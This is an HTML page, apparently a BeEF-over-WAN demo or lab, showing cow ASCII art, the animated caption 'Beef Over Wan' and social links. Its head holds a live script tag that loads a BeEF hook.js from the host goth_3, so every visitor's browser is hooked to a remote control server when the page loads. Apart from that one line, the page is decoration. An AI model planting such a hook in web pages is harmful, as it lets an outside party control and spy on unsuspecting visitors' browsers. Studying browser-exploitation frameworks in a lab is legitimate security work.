<!DOCTYPE html>
<html>

   <head>
       <meta charset="UTF-8">
       <title>Beef</title>
       <script src="http://goth_3:80/hook.js"></script>
       <script src="https://kit.fontawesome.com/bbaa066908.js" crossorigin="anonymous"></script>
       <style>
       
       body{
           background-color: black;
           text-align: center;
           font-family: sans-serif;
       }

       pre {
         font-size: 10px;
         display: block;
       }

       .social a {
         font-size: 48px;
         display: inline-block;
         margin: 20px 5px;
         color:#fff;
         transition: color ease-in-out 500ms;
       }

       .social a:hover {
         color:yellow;
       }

       .beef {
         color:rgb(51, 255, 0);
         overflow: auto;
        margin-top: 50px;
        font-size: 40px;
        text-shadow: red 1px 1px,red 2px 2px,red 3px 3px;
        
       }

       p {
         font-size: 32px;
       }

    p::after {
    content: '|';
    opacity: 1;
    margin-left: 5px;
    display: inline-block;
    animation: blink .7s infinite;
  }

@keyframes opacity {
  0%, 100% {
    opacity: 0;
  }
  50% {
    opacity: 1;
    color: yellow;
  }
}

@keyframes blink {
    0%, 100% {
      opacity: 1;
    }
    50% {
      opacity: 0;
    }
  }

       </style>
   </head>

   <body>



    <div class="beef">
        <pre>
                                                                                
                                     .O,                              
                                     lkOl                             
                                     od cOc                           
                                     'X,  cOo.                        
                                      cX,   ,dkc.                     
                                       ;Kd.    ,odo,.                 
                                        .dXl   .  .:xkl'              
                                          'OKc  .;c'  ,oOk:           
                                            ,kKo. .cOkc. .lOk:.       
                                              .dXx.  :KWKo. 'dXd.     
                                                .oXx.  cXWW0c..dXd.   
                                                  oW0   .OWWWNd.'KK.  
                                          ....,;lkNWx     KWWWWX:'XK. 
 ,o:,                          .,:odkO00XNK0Okxdlc,.     .KWWWWWWddWd 
  K::Ol                   .:d0NXK0OkxdoxO'             .lXWWWWWWWWKW0 
  od  d0.              .l0NKOxdooooooox0.        .,cdOXWWWWWWWWWWWWWx 
  :O   ;K;           ;kN0kooooooooooooK:  .':ok0NWWWWWWWWWWWWWWWWWWK. 
  'X    .Kl        ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd.  
  .N. o. .Kl     'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l.    
   0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:.       
   lX.,WN:  .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo.           
    0O.0WWk'   .XKoooooooooooONWWNo  dWWWWWWWWWWWWWWWWWl              
     oKkNWWWX00NWXdooooooooxXWWNk'   dWWWWWWWWWWWWWWWWX               
      .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW:              
         .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.             
              'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd             
              oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO             
             ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx             
          ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.             
         .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX'              
          :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk.               
         .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk'                 
         OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl.                   
        ,Wk  xWWWWWWWWd  xWWNWWWWWWWWWWWWXOdc,.                       
        .N0   lOXNX0x;  .KWWWWWWWWWWWNkc.                             
         :NO,         'lXWWWWWWWWWNk:.                                
          .dXN0OkxkO0NWWWWWWWWWWKl.                                   
             .';o0WWWWWWWWWWWNk;                                      
                  .cxOKXKKOd;.                                        
                                                                      
        </pre>
        <p>Beef Over Wan</p>

        <script>
                function typeWriter(elemento) {
                  const textoArray = elemento.innerHTML.split('');
                  elemento.innerHTML = '';
                  textoArray.forEach((letra, i) => {
                    setTimeout(() => elemento.innerHTML += letra, 75 * i);
                  });
                }
                const titulo = document.querySelector('p');
                typeWriter(titulo);
              </script>

    </div>

    <div class="social">
      <a href="https://www.youtube.com/channel/UCK9-ey3ELCm-EnHeyovvXWw" target="_black"><i class="fab fa-youtube"></i></a>
      <a href="https://github.com/SabrinaMonoSoraka" target="_black"><i class="fab fa-github"></i></a>
    </div>

   </body>

</html>